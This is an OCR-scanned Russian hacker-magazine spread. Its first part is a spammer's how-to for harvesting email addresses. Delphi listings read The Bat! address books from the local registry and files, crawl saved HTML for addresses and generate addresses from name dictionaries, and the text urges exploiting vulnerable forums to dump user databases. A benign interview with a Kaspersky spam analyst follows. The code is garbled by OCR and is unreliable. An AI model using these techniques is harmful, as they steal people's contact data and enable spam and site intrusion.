файл AddrBook.ini и начинать его потрошить. Сна- 
чала считывается вся секция Profile B объект типа 
TStringList, затем, после запуска цикла, ищется 
фраза Address Book # среди списка всех загружен- 
ных параметров. Если она найдена, то смело мож- 
но считывать значение текущего параметра. После 
считывания стоит проверить путь к полученной ад- 
ресной книге: 
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Если в пути отсутствует слеш, значит, файл с адре- 
сной книгой находится в рабочей папке ТНеВан, поэ- 
тому нужно дописать к имени файла путь его распо- 
ложения. После этого процедуре ReadBook в каче- 
стве параметра передается путь к адресной книге. 

Файл с адресной книгой загружается в фай- 
ловый поток. Так как файлы с адресными книгами 
довольно большие, читать будем по 1024 бай- 
та (смотри листинг 3). 

Проверяется каждый считанный символ. 
Если он соответствует условиям, то возможно, что 
этот символ относится к части мыльника, а значит, 
его можно добавить в переменную _етай. В каче- 
стве условий проверки учитывается: английский 
алфавит, цифры от 0 до 9 и некоторые спецсимво- 
лы, которые может содержать e-mail адрес. Если 
проверка возвращает false, то вполне вероятно, 
что в переменной _етай уже сформировался мыль- 
ник. Остается сделать еще одну проверку: если Te- 
кущий символ равен #13 (конец строки), количе- 
ство символов в переменной _email больше 0 и пе- 
ременная _етай содержит @, можно заносить ад- 
рес в список и продолжать сканировать файл адре- 
сной книги дальше. По завершении работы нужно 
освободить память, выделенную под перемен- 
ные (вызывая метод Free у объектов). 
>» = способ 2 — потрошим WEB. Рабочие мыльни- 
ки набираются на всевозможных форумах и госте- 
вых книгах, так как при регистрации пользователю 
приходиться вводить свой е-тай адрес. 

Раньше этот способ был лучшим. Спамеру 
стоило написать небольшую программку и натра- 
вить ее на какой-нибудь сайт, и через несколько 
часов можно было собирать урожай. Сейчас ситуа- 
ция стала в корне меняться. Разработчики госте- 
вых книг и форумов пытаются встраивать защиту 
от пауков спамеров. Например, если на том же фо- 
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Файл log.log с найденными e-mail адресами 
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//Освобождаем выделенную память под объект 
_AddrBook.Free; 

end; 

BEGIN 

//Инициализируем переменную для работы с реестром 
_reg:=TRegIniFile.Create('Software'); 

//псли нет ветки, которую создает Бат, TO можно выходить, так как скорей всего 

//программа не установлена 


if not _Reg.KeyExists('RIT\The Bat!') then 
begin 

_reg.Free; 

Exit; 
end; 


//Получаем рабочий каталог thebat 
_WorkDir:=_reg.ReadString('RIT\The Bat!', 

//псли полученный рабочий каталог не существует, то... 
if not DirectoryExists(_WorkDir) then 

//Считываем путь к рабочему каталогу пользователя 


‘Working Directory', ''); 


_appDir:=_reg.ReadString('Microsoft \Windows\CurrentVersion\Explorer\Shell 
Folders', 'AppData', ''); 
//Избавляемся от символов переменной окружения 

if Pos('%',_workDir)>0 then 


begin 

_WorkDir:=Copy(_WorkDir, Pos('\', _WorkDir)+1, length(_WorkDir) ); 
_WorkDir:=_appDir+'!\'+_WorkDir; 

end; 


//Инициализируем переменную, к которой будем добавлять пути к найденным адресным книгам 
_adrBookPath:=TStringList.Create; 
//Связываем переменную _ini с файлом настроек адресных книг Бата 
_Ini:=TIniFlIle.Create(_WorkDir+!ADDRBOOK.INI'); 
//Читаем его и выдираем пути ко всем адресным книгам 
_Ini.ReadSection('Profile', _adrBookPath) ; 
_db:=TStringList.Create; 
for i:=0 to _adrBookPath.Count-1 do 


if Pos('Address Book #', _adrBookPath.Strings[i])>0 then 

begin 

_path:=_Ini.ReadString('Profile', _adrBookPAth.Strings[i], ''); 
if pos('\', _path)=0 then 


_path:=_WorkDir+_path; 
//Вызываем процедуру, которая читает файлы с адресной книгой 
ReadBook (_path) ; 
end; 
_db.SaveToFile(ExtractFilePAth(ParamStr(0))+'log.log'); 
_db.Free; 
_Ini.Free; 


_reg.Free; 
_adrBookPath.Free; 
END. 
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for i:=0 to index do 
begin 
if ((_buf[i]>'A') and 
(_buf[i]<'z')) or ((_buf[i]>'1') and (_buf[i]<'9')) or 
(_buf[i]='.') or 
(_buf[i]J='-') or 
(_buf[i]J='_') or 
(_buf[i]='@') then 
begin 
email:=_email+_buf [i]; 

end 


pyme phpBB Bo время регистрации не изменить Ha- 
стройку показа своего e-mail адреса, To по умолча- 
нию его никто не увидит. На других форумах от- 
правка письма происходит через меб-интерфейс. 
Таким образом, разработчики убивают двух зайцев 
сразу: пользователям комфортнее на форуме, 
а спамеры не могут получить е-тай адреса с помо- 
щью своих программок. Что касается гостевых 
книг, то многие разработчики идут на хитрость 
и записывают полученный от пользователя адрес 
так: spider_net(at)inbox(dot)ru. Простой способ 
и на корню обрубает деятельность спам-пауков. 
Но на любое действие есть противодействие. 

> Kak работают спамерские «пауки». Первым 
делом готовится список сайтов, на которые будут 
натравлены пауки. Получив список целей, паук от- 
крывает множество потоков и на полученных стра- 
ницах вылавливает мыльники. Причем учти, 
что прокаченный объем трафика будет большой — 
это основной минус данного способа. Поэтому нуж- 
но с умом выбирать цели, а не качать все подряд. 

Порой выгодней сначала выкачать опреде- 
ленные ресурсы, используя так называемые оф- 
флайн-браузеры. Скачивать сайт можно целиком 
или только какой-то раздел сайта, например фо- 
рум. Задача существенно упрощается. Достаточно 
написать небольшую утилиту, которой нужно ука- 
зывать путь к папке, а она, в свою очередь, начнет 
выдирать мыльники со всех расположенных в ней 
файлах. Искать можно и в кэш-папке твоего брау- 
зера, так как довольно часто во время серфинга ты 
заходишь на различные форумы и сайты, на кото- 
рых есть мыльники. Просканировав все эти файлы, 
можно пополнить свой спам-лист. Единственное 
что, в такой программке необходимо реализовать 
отсев дубликатов и мусора. 

Запускай Delphi и создавай новый проект. 
На этот раз проект будет содержать форму (смотри 
листинг 4). 

Первым делом происходит инициализация 
переменных и присвоение первоначальных значе- 
ний. Далее делается проверка. Если активна пер- 
вая (точнее нулевая) закладка TPageControl, нуж- 
но не проверять мыльники, а сканировать выбран- 
ную директорию. За поиск html-cbaiinos в указан- 
ной директории отвечает процедура FindFiles. В ка- 
честве параметра ей нужно передать начальную 
директорию, а затем она распотрошит все подди- 
ректории. Для поиска файлов используются WinA- 
Р\-функции FindFirst и FindNext. 

При нахождении htmli-cbaiina путь кнему в каче- 
стве параметра передается процедуре ЕтаЕтай. В 
ней и происходит сканирование html-cbavina на пред- 
мет мыльников. Использован такой же алгоритм, как 
и впоиске мыльников в адресной книге TheBat!. Все 
найденные мыльники сохраняются в директории, от- 
куда была запущена программа, в файле 109.09. 

Для теста натравили эту программу на не- 
большой архив, состоящий из html-Bepcun журна- 
ла ХакерСПЕЦ. Поиск по 18 номерам дал на выхо- 
де 1099 мыльников. 


(4) 
procedure TForml.FindFiles(dir: string); 
var 
SearchRec:TSearchRec; 
begin 
if dir[length(dir)]<>'\' then 
Girisdirt+'\'; 
if FindFirst(dir+'*.htm', faAnyFile, SearchRec)=0 then 
repeat 
Inc (_CountFiles) ; 
Label6.Caption:=IntToStr(_CountFiles) ; 
FindEmail (dir+SearchRec.Name) ; 
until FindNext (SearchRec) <>0; 
if FindFirst (dir+'*.*', faDirectory, SearchRec)=0 then 
begin 
repeat 
if ((SearchRec.Attr and faDirectory)=faDirectory) and (SearchRec.Name[1]<>'.') 
then 
FindFiles(dirt+tsearchRec.Namet+'\'); 
until FindNext (SearchRec) <>0; 
FindClose(SearchRec) ; 
end; 
end; 
ункция С kEmail определяет правильность e-mail адреса (5) 


function TForml.CheckEmail (email: string): Boolean; 


//покальная функция, которая проверяет, нет ли в e-mail адресе недопустимых символов 
function CheckAllowedSymbol (5: 
var 


string): boolean; 
i: integer; 
begin 
Result:= false; for i:= 1 to Length(s) do 
begin 
if mot (511 an, ах... then 
Exit; 


end; 


ет, ба 


Result:= true; 
end; 
var 
i: integer; 
_name, _server: string; 
begin 
Result:= false; 
//Сначала проверим, содержит ли мыльник знак @, нет — это 100% He e-mail — можно выходить 


1:= Pos('@', email); if i = 0 then 
Exit; 
//Копируем в переменную _name название ящика, TO есть все, что расположено до знака @ 


= Ш 
//леперь наоборот, копируем доменную часть мыльника 
_server:= Copy(email, 1 + 1, Length(email)); 


_name:= Copy(email, 1, 


//Делаем проверку. Псли длина названия почтового ящика равна 0, либо длина имени 


//домена меньше 5, это значит, это не мыльник, и можно выходить из процедуры 


if (Length(_name) = 0) or ((Length(_server) < 5)) then 
Exit; 
//Проверяем, содержит ли мыльник знак «точка» 
1:= Pos('.', _server); 
if (i = 0) or (i > (Length(_server) - 2)) then 


Exit? 
//Все проверки пройдены, остается лишь проверить на недопустимые символы 
Result:= CheckAllowedSymbol (_name) 
end; 


and CheckAllowedSymbol (_server) ; 
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Ho достаточно много мыльников — одинаковые, что 
недопустимо. Поэтому в программе возможность 
поиска дубликатов реализована на второй заклад- 
ке PageControl. 

Сначала выбирается файл для сохранения 
«чистого» лога с мыльниками, после чего запуска- 
ется проверка. Если мыльника нет в новом логе, то 
добавляем его, в противном случае — пропускаем. 
Но перед добавлением происходит проверка на 
правильность е-тай адреса. Проверка выполняет- 
ся в функции CheckEmail (смотри листинг 5). Если 
функция вернет true, TO мыльник — правильный, 
и его можно добавлять. 

Самая первая примитивная проверка — опре- 
деление наличия знака « @ ». Если его нет, то не име- 
ет смысла продолжать проверку. Следующий этап — 
разделение мыльника на название ящика (все сим- 
волы, которые идут до знака собачки) и имя домена 
(все символы, которые идут после собачки). Отделе- 
ние одной части мыльника от другой происходит с 
помощью функции Сору. Результаты ее выполнения 
сохраняются в переменных _пате и _зегуег. 

Функция CheckEmail содержит в себе еще 
и локальную функцию CheckAllowedSymbol, кото- 
рая предназначена для проверки на недопустимые 
символы (проверяются переменные _пате и _$ег- 
ver). Известно, что e-mail может состоять только из 
латинских букв (в разных регистрах), цифр от 0-9, 
знака подчеркивания (_), тире (-) и точки. Другие 
специальные символы (: , ; = ‘) не могут употре- 
бляться. Если переданный в качестве параметра 
мыльник содержит запрещенные знаки (функция 
вернет false), его добавлять не стоит. 

В качестве теста обработали все тот же лог 
мыльников из архива журнала ХакерСПЕЦ. После 
проверки лог-файл существенно сдулся — оста- 
лось 347 мыльников. 
> способ 3 — генерация. В Сети Ha довольно ста- 
рых бесплатных почтовых сервисах зарегистриро- 
ваны миллионы пользователей. Взять, к примеру, 
самый часто используемый почтовый сервис — 
mail.ru. Он уже довольно долго предоставляет услу- 
ги бесплатной почты, поэтому почтовый ящик 
на этом сервере есть у каждого второго. А это зна- 
чит, что почти все нормальные адреса уже заняты. 
Нормальные — это Te адреса, в которых в качестве 
названия ящика используется реальное имя (или 
ник) человека. Допустим: 190г@ тай.ги, $р!- 
der_net @inbox.ru, sanek @ тай.ги и так далее. 

Теперь понимаешь, как этим пользуются для 
достижения цели? Все, что остается спамеру, — 
составить свой словарь русских имен и популярных 
ников и написать простенькую тулзу, которая будет 
добавлять к каждому логу или имени знак @, плюс 
имя домена! Вероятность существования таких 
ящиков будет практически стопроцентной. 

Подобных бесплатных сервисов достаточно 
не только в рунете, но иу буржуев. Взять тот же 
буржуйский hotmail.com. Представляешь, сколько 
людей пользуется этим меб-сервисом? Только для 
генерации адресов для иностранных почтовых 
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(6) 


string): string; 


function TranslitRus(const Str: 


const 


//пусский алфавит в нижнем регистре 
RusL = 'абвгде\жзийклмнопрстуфхицчшщьыъэюя'; 
//пусский алфавит в верхнем регистре 
RusU = 'АБВОД ЗИОКОМООПОСОУ Ч ry 


//Массив, в котором перечислены по порядку латинские буквы 
mas: array[1..2, 1..33] of string = 


CCN, Mp yaa а ва", 'е',; "yo"; ТА", и, Us ia aaa 
ME И, а По yo “Spey Meh Па, MET Mah ПЕ". 
Hes eet, Meh ВЕ о “sheh® 7. "В. ЧУ, Be Met тури Sye 5 
CER UB АК, NETS ВА, MR ANON: Ny, 09, NTA Uy 
REG UL OMY INT TON IBY, ORT, TS Dy MU, ORY, 
“Khas. Vs": “Ch. “SH, “SSHEAT ПИКУ, My MEY PY а) 
var 
i: Integer; 
_len: Integer; 
_p: integer; 
_d: byte; 
begin 


//Очищаем результат 
result := ''; 


//Получаем длину передаваемого слова 
_len := length(str); 


//Запускаем цикл, в котором сравниваем текущий символ с символом-эквивалентом 
//из нашего массива 

for i := 1 to _len do 
begin 

_а := 1; 

_p := pos(str[i], Rush); 

if р = 0 then 


begin 
_p := pos(str[i], RusU); 
_d := 2 
end; 
if _р <> 0 then 
result := result + mas[_d, _p] 
else 
result := result + str[il]; 
end; 
end; 


служб, естественно, понадобится словарь с ино- 
странными именами. 

Первый вопрос: где взять словарь с именами? 
Его можно составить самому (что очень невыгодно 
и муторно), а можно скачать готовый. К счастью, та- 
ких словарей можно найти огромное количество. 
ИХ, кстати, составляют еще хакеры для своих про- 
грамм подбора паролей. Остается только добавить 
кним имя домена. Вручную добавлять имена доме- 
нов достаточно неудобно и долго (особенно если 
словарь состоит из нескольких тысяч имен), поэто- 
му нужен оптимизатор действий. Логичнее всего 
написать небольшую программку. Мы приведем 
пример на Delphi. 

В примере предусмотрена генерация мыль- 
ников для нескольких доменов, включая возмож- 
ность выбора всех доменов, а также возможность 
транслитерации имен из словаря, в случае, если 
они записаны русскими буквами. Это будет акту- 
ально, если ты вдруг сам решишь составить сло- 
варь имен. Весь код не приводим (он есть на диске 
к журналу), но рассмотрим функцию, которая отве- 
чает за транслитерацию (смотри листинг 6). 

В разделе объявления констант определяются 
две константы: RusL и Rusu. В них перечислен весь 
русский алфавит в разных регистрах. В двумерном 
массиве Mas записаны латинские эквиваленты рус- 
ским буквам. То есть первая в латинской раскладке 
буква «а» будет соответствовать нашей букве «а». 
Теперь, когда есть заранее определенный массив, 
ничего не стоит запустить цикл и в нем проверять 
каждый символ, переданный в качестве параметра 
слова. Если текущий символ найден в массиве той 
или иной раскладки, то это значит, что его можно за- 
менить, в противном случае оставить как есть. 

Для теста мы создали текстовый файл, в ко- 
торый записали несколько произвольных русских 
имен. После этого скормили этот файл программе. 
Спустя секунду программка закончила свою рабо- 
ту и любезно сохранила результат своей деятель- 
ности в выбранный лог-файл. 
> — способ 4 — срываем куш. Так уж повелось, 
что многие пользователи на своих сайтах использу- 
ют форумы, СМ$ и так далее. Как правило, 
все пользуются хорошо известными и популярными 
решениями: phpBB, IPB, PostNuke, Joomla... 
Ноу всех этих чудесных программ рано или поздно 
находят ошибки в коде. В результате появляются 
перспективы для атаки: php Including, SQL Injection, 
XSS. Воспользовавшись одним изтипов атак, мож- 
но сделать с сайтом все что угодно, начиная от ба- 
нального дефейса и заканчивая дампом всех баз 
данных. В контексте статьи нас интересует дамп ба- 
зы данных, которая содержит адреса пользовате- 
лей, вводимые ими при регистрации. 

В момент появления нового публичного эк- 
сплойта можно запросто поднять кучу баз данных с 
адресами пользователей. Все, что потребуется, — 
отыскать уязвимые форумы и нанести решающий 
удар. Как правило, в первые месяцы после появле- 
ния эксплойта уязвим каждый второй ресурс © 
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«Ашманов и Партнеры», 
теперь — в «Лаборатории 
Касперского». 


БОЛЕЗНЬ СПАМА ИЗЛЕЧИМА 

ИЛИ ЖЕ ЭТО ПРОГРЕССИРУЮЩАЯ 
ОПУХОЛЬ С ЛЕТАЛЬНЫМ ИСХОДОМ? 
РАНЬШЕ ПОЛЬЗОВАТЕЛИ 
ВЫЛАВЛИВАЛИ СПАМ СРЕДИ ПИСЕМ, 
А ТЕПЕРЬ ВЫЛАВЛИВАЮТ ПИСЬМА 
СРЕДИ СПАМА. ЭТА ТЕНДЕНЦИЯ 
ПУГАЕТ! 


АННА ВЛАСОВА: Сразу замечу, что письма сре- 
ди спама вылавливают только те пользователи, 
которые не защищены спам-фильтрами. Пользо- 
ватели защищенных серверов, наоборот, иногда 
недоумевают, что же это за спам такой, о котором 
так много говорят. Современные программы за- 
щиты вполне способны обеспечить высокий уро- 
вень фильтрации спама, отсекая более 90 «мусор- 
ных» сообщений из 100, атаковавших пользова- 
тельский ящик. 

Но болезнь под названием «спам» действи- 
тельно существует. И этот факт наглядно подт- 
верждает статистика. По данным Лаборатории 
Касперского, доля спама в общем потоке почто- 
вого трафика Рунета не опускается ниже 70% 
(единственное исключение — новогодние празд- 
ники, когда доля спама падает до 50-60%). Ко- 
нечно, это усредненные данные по многим на- 
шим источникам, на серверах бесплатной почто- 
вой службы — например, Mail.ru или Уапаех — 
доля спама будет еще выше (более 90%). А на 
небольших корпоративных серверах может быть 
и ниже 70%. 

Несмотря на впечатляющие цифры — семь 
писем из десяти являются «мусором», — над дос- 
тавкой, обработкой, маршрутизацией и хранением 
которого трудятся как «железные», так и людские 
ресурсы, — я бы не назвала общую тенденцию ка- 
тастрофической: 

1 По сравнению с предыдущим годом не вид- 
но резкого скачка в доле спама. Похоже, произош- 
ло своеобразное «насыщение» почты спамом, и 
сейчас уровень спама замер на той отметке, выше 
которой ситуация действительно может стать кри- 
тической. Конечно, это равновесие очень хрупкое 
и может быть нарушено в любой момент. Особенно 
если спамеры вложат существенные средства 
и ресурсы в разработку ПО, нацеленного на обход 
наиболее распространенных фильтров. Но ведь 
и антиспамеры сложа руки сидеть не будут. 

2 Защита, предоставляемая современными 
фильтрами, достаточно сильна. И спамеры это 


ощущают. Именно поэтому они активно ищут но- 
вые рынки сбыта своих услуг, мигрируют в мессен- 
джеры и мобильную связь. 

Вывод: о летальном исходе пока говорить 
преждевременно. Хотя трубить победу антиспаме- 
ров тоже рано. К сожалению, защита от спама по- 
ка не стала такой же широкораспространенной, 
как защита от вирусов, и спамерам есть чем пожи- 
виться за счет почты без спам-фильтров. 


КАК ИЗБЕЖАТЬ ЛАВИНЫ? 
ИСПОЛЬЗОВАНИЕ СУЩЕСТВУЮЩИХ 
СПАМ- ФИЛЬТРОВ ОТСЕКАЕТ 
ОПРЕДЕЛЕННЫЙ ПРОЦЕНТ МУСОРА, 
НО ОСТАВШИЙСЯ ПРОЦЕНТ ВЕСЬМА 
ОТНОСИТЕЛЕН — ЧЕМ БОЛЬШЕ 
ОБЩЕЕ КОЛИЧЕСТВО СПАМА, 

ТЕМ БОЛЬШЕ И КОЛИЧЕСТВО 
НЕОТСЕЧЕННОГО МУСОРА. 


АННА ВЛАСОВА: Да, это верно. Практически все 
производители антиспама обещают отсечь только 
некоторую долю спама. И хотя планка, заданная 
антиспамерами, высока — около 95% фильтрации 
спама, — оставшиеся 5% действительно могут вы- 
ражаться в ощутимом количестве мусора, кото- 
рый свалится на пользователя. Ситуация ослож- 
няется еще тем, что спамеры не стоят на месте: 
они вкладывают средства в разработку ново- 
го ПО, специально настроенного на «пробивание» 
популярных средств защиты. Многие спам-рас- 
сылки тестируются на бесплатных антиспам-прог- 
раммах (например, на «СпамАссасин»'е) еще до 
того, как их начнут массово распространять по 
миллионам адресов. 

Самый действенный способ остановить ла- 
вину — это... перестать реагировать на спам. Сде- 
лать его экономически невыгодным для спамеров. 
Если пользователи перестанут покупать товары, 
рекламируемые в спаме, и уж тем более переста- 
HYT «вестись» на мошеннические уловки, научатся 
отличать фишинг от легитимных банковских сооб- 
щений ит.п., то спам отомрет сам по себе, потому 
что спамеры работают не ради интереса, а исклю- 
чительно ради денег. 

К сожалению, это решение проблемы отно- 
сится к разряду утопических. Интернет постоянно 
растет, появляются новые пользователи и, увы, 
делают одни и те же ошибки, откликаясь на «ниге- 
рийские» письма, переводя деньги на «волшеб- 
ные» кошельки мертопеу и просто покупая деше- 
вые, но очень соблазнительно расписанные рек- 
ламой товары. На самом деле, ровно то же самое 
происходит и в реальном мире. Я лично не знаю 
способа убедить людей отказаться от покупки кар- 
тин с березками, выложенными янтарной крош- 
кой, малахитовых накладок на приборную панель 
автомобиля, универсального устройства для эко- 
номии электроэнергии, прибора для заплетания 
косичек, ручек с невидимыми чернилами, «веч- 
ных» фонариков, бронзовых бюстов Путина ит.п. 
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Все это — товары, рекламируемые спамерами, HO 
в окружающем «реальном» мире вполне можно 
найти их аналоги. 

Что же остается? А остается упорная, отчас- 
ти нудная работа по борьбе с этой лавиной. Эта 
работа включает в себя не только технические 
средства противодействия, но и юридическое (со- 
вершенствование законодательства) и даже обра- 
зовательное направление. 


ЧТО ДЕЛАТЬ КОНЕЧНЫМ 
ПОЛЬЗОВАТЕЛЯМ? КАКИЕ 
ФИЛЬТРЫ / ПРОГРАММЫ / СИСТЕМЫ 
СЕГОДНЯ НАИБОЛЕЕ ЭФФЕКТИВНЫ? 


АННА ВЛАСОВА: Конечным пользователям — 
заводить почтовые ящики на защищенных от спа- 
ма серверах. Если это невозможно, то использо- 
вать персональные средства защиты. Сейчас 
многие производители предлагают для ПК анти- 
вирус и антиспам «в комплекте». «Лаборатория 
Касперского» в этом плане не исключение: у нас 
есть как серверные, так и комплексные персо- 
нальные решения. 

Еще одна возможность — фильтрация спа- 
ма как сервис. Это значит, что пользователю не 
надо возиться с установкой программ и менять 
провайдера/почтовый сервер из-за неподхо- 
дящей системы защиты от спама (или ее отсут- 
ствия). Он просто направляет свою почту через 
определенные серверы, на которых стоят спам- 
фильтры. При этом, в конце концов, письма ока- 
зываются в привычном пользователю ящике, но 
только спам будет специальным образом разме- 
чен (например, спам, прошедший через фильтры 
сервиса «Спамтест» «Лаборатории Касперско- 
го», получит метку [!!Spam] в теме сообщения). 
При этом письма не удаляются без ведома поль- 
зователя и не раскладываются принудительным 
образом по заранее заданным папкам (как это 
обычно происходит на бесплатных почтовых 
службах). Все, что делает сервис — это только 
проверка и разметка. 

Если же спам все-таки попал в Inbox, то 
советую соблюдать элементарные «правила ги- 
гиены»: 

1 Не открывай вложения и не переходи по 
ссылкам (URL) в сообщениях от неизвестных от- 
правителей. Спам нередко используется как 
инструмент для распространения троянов и про- 
чих зловредных программ. Да и с известными 
отправителями лучше проявлять осторожность. 
Если сообщение написано в непривычном для 
адресата стиле — например, слишком фамиль- 
ярно, или, наоборот, как-то официально — 
не спеши делать вывод, что твой друг встал не 
с той ноги. Вполне возможно, что это автомати- 
чески сгенерированное спам-сообщение, целью 
которого является реклама сайта, рассылка ви- 
русов и все в таком духе. А на твой адрес 
оно пришло только потому, что у кого-то из твоих 


друзей зловредными программами была украде- 
на адресная книга, и теперь по ней производится 
рассылка спама. 

2 Бесплатный сыр пока еще существует 
только в мышеловках. Если ты не регистрировал- 
ся в лотерее и не покупал лотерейный билет, 
то тебе не может прийти сообщение о выигрыше 
миллиона долларов. И Билл Гейтс не склонен раз- 
давать лотерейные призы лично. Не надо оболь- 
щаться мифическим призом и расценивать нес- 
колько сотен долларов, которые, возможно, пот- 
ребуют спамеры «в счет уплаты налогов», как ме- 
лочевку по сравнению с миллионом. Миллион 
так и останется мифом, а вот вполне реальные 
сбережения уйдут в никуда. 

з Подумай, прежде чем приобретать удиви- 
тельно дешевые товары/услуги. Да, интернет-ма- 
газину не нужно помещение и толпа продавцов, 
но значит ли это, что лекарства там могут стоить 
на порядок (а то и несколько порядков) дешевле, 
чем в аптеке? В спаме часто рекламируются конт- 
рафактные, контрабандные товары, а также това- 
ры сомнительного качества. Ко всему прочему 
спамеры могут дешево перепродавать товары, 
купленные по украденным кредиткам. Ты хочешь 
в этом участвовать? 

4 Не отвечай спамеру. Либо твой ответ попа- 
дет к ни о чем не подозревающему пользователю, 
так как спамеры умело фальсифицируют заго- 
ловки сообщений и случайным образом подстав- 
ляют в поля «From» и «То» адреса из одной 
и той же базы. Либо спамер узнает, что ты пытал- 
ся ответить, и пометит твой адрес как «актив- 
ный». Тогда ты рискуешь получить еще больше 
спама, чем раньше. В любом случае, спамер ни- 
как не отреагирует ни на угрозы, ни на ругань. 
Для него это просто работа. 

5 Не оставляй везде один и тот же почтовый 
адрес. Для регистрации на форумах и т.п. жела- 
тельно иметь отдельный е-тай, который можно от- 
носительно безболезненно удалить, как только он 
окажется «заспамленным». 


В СИЛУ МАССОВОСТИ ПРОБЛЕМЫ 
ОСНОВНАЯ НАГРУЗКА ПО БОРЬБЕ 
СО СПАМОМ ЛЕГЛА НА 
АДМИНИСТРАТОРОВ И ИНТЕРНЕТ- 
ПРОВАЙДЕРОВ. КАКИЕ ТЕНДЕНЦИИ И 
ПРАКТИЧЕСКИЕ НАРАБОТКИ ЕСТЬ 

В ЭТОМ НАПРАВЛЕНИИ? 


АННА ВЛАСОВА: Это всевозможные корпора- 
тивные решения, предназначенные для защиты 
почтовых серверов. Наиболее известные отече- 
ственные разработки — это «Kaspersky Anti- 
Spam» «Лаборатории Касперского» и «Спамобо- 
рона» компании «Яндекс». Оба продукта хорошо 
себя рекомендуют на рынке, в каждом есть уни- 
кальные технологии, собственные разработки. 
Например, в антиспаме «Лаборатории Касперс- 
кого» используется более 15 методов детекции 


спама, среди которых есть такие уникумы как 
графический анализатор, умеющий отличать 
анимированный и «зашумленный» графичес- 
кий спам (спам, в котором текст сообщения не 
написан, а по сути нарисован на «картинке», ко- 
торая приложена к сообщению как графичес- 
кое вложение). 


БЫЛИ ПРИНЯТЫ ОПРЕДЕЛЕННЫЕ 
ПОПРАВКИ К ЗАКОНУ "О РЕКЛАМЕ", 
НО СИТУАЦИЯ НА РЫНКЕ 
СПАМ-ИНДУСТРИИ ПРАКТИЧЕСКИ 
НЕ ИЗМЕНИЛАСЬ. С ЧЕМ СВЯЗАНА 
ПРОБУКСОВКА? 


АННА ВЛАСОВА: В некотором смысле, мы повто- 
ряем путь, который уже пройден многими западны- 
ми странами. Австралийское законодательство, 
направленное против спама, считается одним из 
самых эффективных. Законы были приняты 
в 2003 году, начали действовать в 2004, а первый 
процесс против спамеров начался в 2005. Да, госу- 
дарственная машина — медленная. Возможно, это 
не так уж и плохо. 

У нас же со времени вступления в силу по- 
правок к «Закону о рекламе» РФ (с 1 июля 2006 
года) прошло всего 4,5 месяца. Думаю, пока рано 
делать выводы о «пробуксовке» закона. Хотя ра- 
ботать ему действительно сложно. Внятный ме- 
ханизм, как именно конкретному пользователю 
или даже организации бороться со спамом, в за- 
коне не прописан, это верно. Кроме того, закон 
затрагивает только ту часть спама, которая явля- 
ется рекламой, а это далеко не весь спам. Да, по- 
ка большинство спамерских сообщений — это 
реклама, но доля криминализированного спама, 
который рекламой не является (фишинг, под- 
дельные уведомления о выигрыше в лотерею, 
мошенническая эксплуатация $М$-сервисов 
ит.п.), постоянно растет. На первые 9 месяцев 
2006 года криминализированный спам составля- 
ет уже 16% от всего спама. И речь идет только 
о явном мошенничестве. К сожалению, сущест- 
венная часть оставшегося спама также тяготеет 
к криминалу. Например, эксперты «Лаборатории 
Касперского» пока не относят спам с рекламой 
акций различных компаний, которой изобилует 
осень 2006 года, к «Компьютерному мошенниче- 
ству», хотя по сути это попытка нечестной нак- 
рутки стоимости акций за счет голословных обе- 
щаний пользователям. Возможно, это еще не мо- 
шенничество с точки зрения закона, но уже очень 
близко к этому. 

Наиболее наглядный пример криминилизи- 
рованного спама — автор письма уговаривает 
пользователя перевести деньги на некий «вол- 
шебный» кошелек Webmoney, обещая, что все 
деньги вернутся обратно с прибылью. Думаю, 
можно не объяснять, что на самом деле произой- 
дет с этими деньгами. Они не вернутся никогда, 
атак и останутся в кошельке спамера. 


ЭФФЕКТИВНОСТЬ СПАМА 

В ПОЧТОВЫХ РАССЫЛКАХ ПАДАЕТ 

И СПАМЕРЫ УЖЕ НАЧАЛИ АТАКОВАТЬ 
БЛОГИ, ФОРУМЫ, МЕССЕНДЖЕРЫ 

И ДРУГИЕ МАССОВЫЕ СРЕДСТВА 
ОБЩЕНИЯ. ЧТО ДАЛЬШЕ? 


АННА ВЛАСОВА: Да, дальше объектами спаме- 
ров, действительно, станут блоги, форумы, мес- 
сенджеры. Только это будут не эксперименты, 
как это происходит сейчас, а такие же массовые 
атаки, как и на электронную почту. Хотя спам 
в блогах и форумах уже поставлен на вполне про- 
фессиональную основу. Скорее всего, впереди 
тот же путь, который прошла защита почты, вот 
только пройден он будет быстрее. За 2-3 года, 
а не за десятилетие, как это было с почтовым 
спамом. 


ЕСЛИ ОТСЛЕДИТЬ РАЗВИТИЕ 
ТЕХНОЛОГИЙ СПАМЕРОВ, ТО КАК ОНИ 
ЭВОЛЮЦИОНИРОВАЛИ? И КАКИЕ 
ПРОГНОЗЫ МОЖНО ДАТЬ 
ДАЛЬНЕЙШЕМУ ИХ РАЗВИТИЮ? 


АННА ВЛАСОВА: В развитие технологий спаме- 
ров есть интересная закономерность. Примерно 
каждые два года неожиданно всплывают техно- 
логии, которые спамеры уже пытались использо- 
вать, но они не прижились. Не знаю, с чем это 
связать. Возможно, «смена поколений» у спаме- 
ров как раз 2-3 года и составляет, и каждое но- 
вое поколение хочет самостоятельно убедиться, 
что рассылка спама «в звездочках» и других 
мелких символах (когда слова текста не написа- 
ны, а составлены из символов, набранных мел- 
ким шрифтом) не работает и не помогает про- 
бить спам-фильтры. 

Практически весь 2006 год прошел у спаме- 
ров под знаком экспериментов с графикой. Уже 
упомянутый бум рекламых акций тесно связан 
с новыми технологиями спамеров. В августе 
2006 года спамеры ввели в эксплуатацию техноло- 
гию анимированного спама. Анимация явилась 
продолжением разработок, связанных с «графи- 
ческим» спамом, впервые массово атаковавшим 
почтовые ящики в 2004 году. Тогда появление гра- 
фического вариативного («зашумленного») спама 
пробило серьезную брешь в антиспам-защите раз- 
личных производителей, но спамеры торжествова- 
ли недолго. Через 1-2 месяца компании-разработ- 
чики антиспамового программного обеспечения 
нашли способ, как решить эту проблему. В 2006 го- 
ду спамеры снова сделали ставку на графику. 
С начала года было предпринято несколько попы- 
ток совершенствования технологий, использую- 
щих элементы графического представления спа- 
ма. Это были замены отдельных букв в тексте их 
изображениями, использование на «картинках 
с текстом» редких шрифтов (например, готическо- 
го), наклон «картинки» в спамерском сообщении 


на несколько градусов и многое другое. Судя по 
всему, они не имели большого успеха, поэтому и 
широкомасштабного продолжения не последова- 
ло. Однако анимированный спам оказался наибо- 
лее успешной находкой спамеров. 

Первые анимированные рассылки были за- 
фиксированы аналитиками «Лаборатории Каспе- 
рского» в самом конце августа 2006 года. И с тех 
пор они постоянно совершенствуются, хотя прош- 
ло всего три месяца с момента появления новой 
технологии. Спамеры используют СИЕ-анимацию, 
